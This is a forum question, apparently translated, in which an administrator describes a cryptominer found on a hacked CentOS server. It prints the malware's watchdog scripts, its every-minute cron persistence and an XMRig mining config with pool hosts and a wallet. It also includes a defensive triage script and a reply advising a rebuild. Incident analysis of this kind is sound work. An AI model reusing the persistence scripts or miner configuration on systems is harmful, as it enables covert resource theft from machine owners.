
While investigating why the server went down, I found that a process called WQxmr was eating up resources.

When I examined it, there was an unknown directory, /root/.CentOS-WQxmr, in which commands and so on had been placed.

/root/.CentOS-WQxmr/
/root/.CentOS-WQxmr/pro/
/root/.CentOS-WQxmr/pro/re.sh
#!/bin/bash
# Forgetfulness: 250051917
# What's the forgetfulness Nana, Rina Naga.
# Watchdog: count running CWQxmr processes, excluding the grep itself
count=$(ps -ef | grep CWQxmr | grep -v "grep" | wc -l)
echo $count
# If the miner is not running, restart it in the background
if [ 0 == $count ]; then
  cd ~/.CentOS-WQxmr/pro/
  bash ./CWQxmr &
fi

/root/.CentOS-WQxmr/pro/CWQxmr
This was an executable file running in the background.
It was a compiled binary, so I could not copy and paste its contents.


/root/.CentOS-WQxmr/pro/self.sh
#!/bin/bash
# Forgetfulness: 250051917
# What's the forgetfulness Nana, Rina Naga.
# Unconditionally start the miner in the background
cd ~/.CentOS-WQxmr/pro/
bash ./CWQxmr &


/root/.CentOS-WQxmr/pro/ok.log
Sunday, August 12, 2018 11:04:46 JST
C
Sunday, August 12, 2018 11:04:46 JST
Successful addition of C-K
Sunday, August 12, 2018 11:04:46 JST
Completed with the armor
Sunday, August 12, 2018 11:05:03 JST
C
Sunday, August 12, 2018 11:05:03 JST
Successful addition of C-K
Sunday, August 12, 2018 11:05:03 JST
Completed with the armor
Monday, August 20, 2018 18:33:02 JST
C
Monday, August 20, 2018 18:33:02 JST
Successful addition of C-K
Monday, August 20, 2018 18:33:02 JST
Completed with the armor


/root/.CentOS-WQxmr/pro/config.json
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-priority": 4,
    "donate-level": 1,
    "log-file": null,
    "max-cpu-usage": 75,
    "pools": [
        {
            "url": "xmr.f2pool.com:13531",
            "user": "4DSQMNzzq46N1z2pZWAVdeA6JvUL9TCB2bnBiA3ZzoqEdYJnMydt5akCa3vtmapeDsbVKGPFdNkzqTcJS8M8oyK7WGip9afNf2WH33wRTJ",
            "pass": "x",
            "keepalive": true,
            "nicehash": false,
            "variant": -1
        },
        {
            "url": "pool.supportxmr.com:5555",
            "user": "4DSQMNzzq46N1z2pZWAVdeA6JvUL9TCB2bnBiA3ZzoqEdYJnMydt5akCa3vtmapeDsbVKGPFdNkzqTcJS8M8oyK7WGip9afNf2WH33wRTJ",
            "pass": "x: [email protected]",
            "keepalive": true,
            "nicehash": false,
            "variant": 1
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 10,
    "safe": false,
    "syslog": false,
    "threads": null
}

I killed the process and deleted the directory, so it no longer seems to be running.
"/root/.CentOS-WQxmr/pro/re.sh" had been set to run from cron every minute; I deleted that entry as well.

I'm curious what this executable did. Has anyone had a similar experience?
If anyone knows, please let me know.

Executable files are uniform.
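The artifacts above show a typical cryptominer setup: an XMRig-style config.json naming the pools and wallet, a cron entry that runs re.sh every minute, and re.sh restarting the miner whenever ps no longer shows it. The following triage helper is an added example, not code from the question or the answer. It pulls the pool hosts, ports and wallet/user out of a config.json, finds crontab entries that reference the malware directory and notes whether they run every minute, and lists PIDs from `ps -ef` output whose command mentions the miner name. All inputs below are constructed samples modelled on the page; the wallet is a placeholder, not the real one, and the function names are this example's own.

```python
"""Triage helper for an XMRig-style cryptominer infection (added example)."""
import json
import re
from typing import Dict, List

# --- Constructed sample input, modelled on the artifacts in the question ---------
# Placeholder wallet (95 chars, like a Monero address); NOT the address from the page.
FAKE_WALLET = "4" + "A" * 94

SAMPLE_CONFIG = json.dumps({
    "algo": "cryptonight",
    "background": True,
    "max-cpu-usage": 75,
    "pools": [
        {"url": "xmr.f2pool.com:13531", "user": FAKE_WALLET, "pass": "x"},
        {"url": "stratum+tcp://pool.supportxmr.com:5555", "user": FAKE_WALLET, "pass": "x"},
    ],
})

# Constructed crontab: the every-minute watchdog between two benign entries.
SAMPLE_CRONTAB = [
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "* * * * * bash /root/.CentOS-WQxmr/pro/re.sh >/dev/null 2>&1",
    "# comment line",
    "",
    "30 4 * * 0 /usr/sbin/logrotate /etc/logrotate.conf",
]

# Constructed `ps -ef` output (UID PID PPID C STIME TTY TIME CMD).
SAMPLE_PS = [
    "UID        PID  PPID  C STIME TTY          TIME CMD",
    "root         1     0  0 Aug12 ?        00:00:05 /usr/lib/systemd/systemd",
    "root      4321     1 99 Aug12 ?        12:34:56 ./CWQxmr",
    "root      5555  5000  0 10:01 pts/0    00:00:00 grep CWQxmr",
]

# Optional scheme, then host, then optional :port (XMRig accepts both forms).
_URL_RE = re.compile(r"^(?:[a-z+]+://)?([^:/]+)(?::(\d+))?$")


def parse_pool_indicators(config_text: str) -> List[Dict[str, str]]:
    """Extract pool host, port and the user field (usually the wallet) from config.json."""
    cfg = json.loads(config_text)
    found = []
    for pool in cfg.get("pools", []):
        m = _URL_RE.match(pool.get("url", ""))
        if not m:
            continue
        found.append({
            "host": m.group(1),
            "port": m.group(2) or "",
            "user": pool.get("user", ""),
            "algo": cfg.get("algo", ""),
        })
    return found


def find_cron_persistence(crontab_lines: List[str], path_fragment: str) -> List[Dict[str, object]]:
    """Crontab entries whose command mentions path_fragment; every_minute is True
    when all five schedule fields are '*', the schedule re.sh was installed with."""
    hits = []
    for line in crontab_lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        schedule, command = fields[:5], fields[5]
        if path_fragment in command:
            hits.append({
                "schedule": " ".join(schedule),
                "command": command,
                "every_minute": all(f == "*" for f in schedule),
            })
    return hits


def find_miner_processes(ps_lines: List[str], marker: str) -> List[int]:
    """PIDs from `ps -ef` output whose command contains marker. The grep process is
    excluded by inspecting the command column rather than with `grep -v grep`."""
    pids = []
    for line in ps_lines[1:]:  # skip the header row
        parts = line.split(None, 7)
        if len(parts) < 8:
            continue
        pid, cmd = parts[1], parts[7]
        if marker in cmd and not cmd.split()[0].endswith("grep"):
            pids.append(int(pid))
    return pids


def triage(config_text: str, crontab_lines: List[str], ps_lines: List[str],
           marker: str, path_fragment: str) -> Dict[str, object]:
    """Combine the three checks into one report for the incident notes."""
    return {
        "pools": parse_pool_indicators(config_text),
        "cron": find_cron_persistence(crontab_lines, path_fragment),
        "pids": find_miner_processes(ps_lines, marker),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_CONFIG, SAMPLE_CRONTAB, SAMPLE_PS, "CWQxmr", ".CentOS-WQxmr")
    print(json.dumps(report, indent=2))
```

On a real host the inputs would come from the recovered config.json, `crontab -l` for root (plus /etc/cron.d and /var/spool/cron), and `ps -ef`. Because the cron entry restarts the miner within a minute, remove the cron entry before killing the process; doing it in the other order is exactly what re.sh is designed to survive. The pool hosts and wallet string are the indicators worth keeping for firewall logs and for comparing with other hosts.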

  • Answer # 1

    It looks like a mining program.
    The server's root account was hijacked and used without permission;
    someone may have been mining cryptocurrency on it.

    That said,
    since there may be adverse effects that have not shown up yet,
    wouldn't it be better to reinitialize the server and rebuild its security from scratch?
    You can't say it's fine just because you changed the root password.